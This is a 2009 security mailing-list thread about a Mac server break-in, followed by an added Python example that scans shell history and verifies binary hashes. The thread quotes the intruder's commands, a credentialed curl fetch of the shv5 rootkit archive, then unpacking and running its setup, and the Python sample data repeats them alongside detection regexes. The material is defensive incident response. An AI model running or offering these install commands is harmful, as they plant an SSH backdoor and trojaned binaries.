[nsp-sec] MAC root kit found on www.funmangames.com 208.113.230.135- ASN 26347
Joel Rosenblatt
joel at columbia.edu
Mon Mar 30 15:18:10 EDT 2009
Thanks Donald.
Our standard fix is nuke and pave .. I meant removed from the machine serving it :-)
Regards,
Joel
--On Monday, March 30, 2009 12:49 PM -0600 "Smith, Donald" <Donald.Smith at qwest.com> wrote:
> That is shv5, a unix root kit. They may have updated it to compile on macs but it's been around for years.
> It can be removed.
> Rootkit hunter can detect it. http://www.rootkit.nl/articles/rootkit_hunter_changelog.html
> chkrootkit also finds it. http://www.chkrootkit.org
>
> Primarily it puts up a back door ssh and trojans several binaries.
>
> Security through obscurity WORKS against some worms and ssh attacks:)
> Donald.Smith at qwest.com gcia
>
>> -----Original Message-----
>> From: nsp-security-bounces at puck.nether.net
>> [mailto:nsp-security-bounces at puck.nether.net] On Behalf Of
>> Joel Rosenblatt
>> Sent: Monday, March 30, 2009 12:01 PM
>> To: nsp-security at puck.nether.net
>> Subject: [nsp-sec] MAC root kit found on www.funmangames.com
>> 208.113.230.135- ASN 26347
>>
>> ----------- nsp-security Confidential --------
>>
>> Hi,
>>
>> We had a break-in of a Mac server (bad root password .. duh)
>> - upon going through the log of commands run, we came across
>>
>> curl -O ftp://haddd:itrules@www.funmangames.com/kit5.tar
>>
>> tar xzf kit5.tar
>>
>> ls -a
>>
>> cd shv5
>>
>> ./setup abelha 54
>>
>> It appears to be a Mac root kit.
>>
>> AS | IP | AS Name
>> 26347 | 208.113.230.135 | DREAMHOST-AS - New Dream Network, LLC
>>
>> I wonder if it could be removed.
>>
>> Thanks,
>> Joel Rosenblatt
>>
>> Joel Rosenblatt, Manager Network & Computer Security
>> Columbia Information Security Office (CISO)
>> Columbia University, 612 W 115th Street, NY, NY 10025 / 212 854 3033
>> http://www.columbia.edu/~joel
>>
>>
>>
>> _______________________________________________
>> nsp-security mailing list
>> nsp-security at puck.nether.net
>> https://puck.nether.net/mailman/listinfo/nsp-security
>>
>> Please do not Forward, CC, or BCC this E-mail outside of the
>> nsp-security
>> community. Confidentiality is essential for effective
>> Internet security counter-measures.
>> _______________________________________________
Joel Rosenblatt, Manager Network & Computer Security
Columbia Information Security Office (CISO)
Columbia University, 612 W 115th Street, NY, NY 10025 / 212 854 3033
http://www.columbia.edu/~joel
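Two checks a responder would want to script from the facts in this thread: scanning the recovered command log for the fetch, unpack and install chain quoted above, and verifying key binaries against a known-good hash baseline, since the kit is reported to trojan several of them. The block below is an added example, not code from the thread, from shv5, or from rkhunter/chkrootkit. The sample history embeds the five commands quoted in the original report plus constructed benign filler; the baseline and "on-disk" contents are constructed in-memory stand-ins, and the `read_bytes` callback, `Finding` class and all function names are assumptions of this example.

```python
import hashlib
import re
from dataclasses import dataclass

# Constructed sample of a recovered shell history. Lines 2-6 reproduce the
# command sequence quoted in the thread; the rest are benign filler added
# here so the scanner has something to ignore.
SAMPLE_HISTORY = """\
cd /tmp
curl -O ftp://haddd:itrules@www.funmangames.com/kit5.tar
tar xzf kit5.tar
ls -a
cd shv5
./setup abelha 54
ls -la /var/log
"""

# Stages of a fetch -> unpack -> run-local-installer chain.
FETCH_RE = re.compile(r"^\s*(curl|wget|ftp|fetch)\b")
# user:password@host inside an ftp:// or http(s):// URL
CREDS_IN_URL_RE = re.compile(r"(?:ftp|https?)://[^/\s:@]+:[^/\s@]+@")
UNPACK_RE = re.compile(r"^\s*tar\s+(?:-?[a-zA-Z]*x[a-zA-Z]*|--extract)\b")
RUN_LOCAL_RE = re.compile(r"^\s*\./(\S+)")


@dataclass
class Finding:
    line_no: int      # 1-based index among non-empty history lines
    command: str
    reasons: list


def scan_history(text, window=6):
    """Flag history lines that look like a remote-kit install chain.

    A fetch is always reported (with extra weight when the URL embeds
    credentials); an archive extraction or a ./script execution is reported
    when it follows a fetch/unpack within `window` commands.
    """
    lines = [l for l in text.splitlines() if l.strip()]
    findings = []
    last_fetch = None
    last_unpack = None
    for i, cmd in enumerate(lines):
        reasons = []
        if FETCH_RE.search(cmd):
            reasons.append("remote fetch")
            if CREDS_IN_URL_RE.search(cmd):
                reasons.append("credentials embedded in URL")
            last_fetch = i
        if UNPACK_RE.search(cmd):
            reasons.append("archive extracted")
            if last_fetch is not None and i - last_fetch <= window:
                reasons.append("extracted shortly after a remote fetch")
            last_unpack = i
        m = RUN_LOCAL_RE.search(cmd)
        if m and any(j is not None and i - j <= window
                     for j in (last_fetch, last_unpack)):
            reasons.append(f"local script ./{m.group(1)} run after fetch/unpack")
        if reasons:
            findings.append(Finding(i + 1, cmd, reasons))
    return findings


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def verify_binaries(baseline, read_bytes):
    """Return the paths whose SHA-256 no longer matches the baseline.

    `baseline` maps path -> expected hex digest. `read_bytes(path)` is
    injected so the check can be run against a mounted image from clean
    media rather than through the possibly trojaned live system.
    """
    return [path for path, expected in baseline.items()
            if sha256_hex(read_bytes(path)) != expected]


# Constructed stand-in for the real binaries: known-good contents, and the
# same set with one binary replaced, as a trojaned ssh would be.
GOOD_BINARIES = {"/bin/ls": b"ls-known-good", "/usr/bin/ssh": b"ssh-known-good"}
SAMPLE_BASELINE = {p: sha256_hex(b) for p, b in GOOD_BINARIES.items()}
SAMPLE_IMAGE = dict(GOOD_BINARIES, **{"/usr/bin/ssh": b"ssh-with-backdoor"})


def demo_verify():
    return verify_binaries(SAMPLE_BASELINE, SAMPLE_IMAGE.__getitem__)


if __name__ == "__main__":
    for f in scan_history(SAMPLE_HISTORY):
        print(f"line {f.line_no}: {f.command}  <- {', '.join(f.reasons)}")
    print("tampered:", demo_verify())
```

Both checks only help if run from outside the compromised system: a kit that replaces ls, ps or ssh can also hide its files and lie about hashes to anything run on the live host, and a history file is only evidence if the intruder did not clear it. Hash the disk from a known-good boot, compare to a baseline taken before the break-in, and treat any mismatch as confirmation that rebuilding is the safer course.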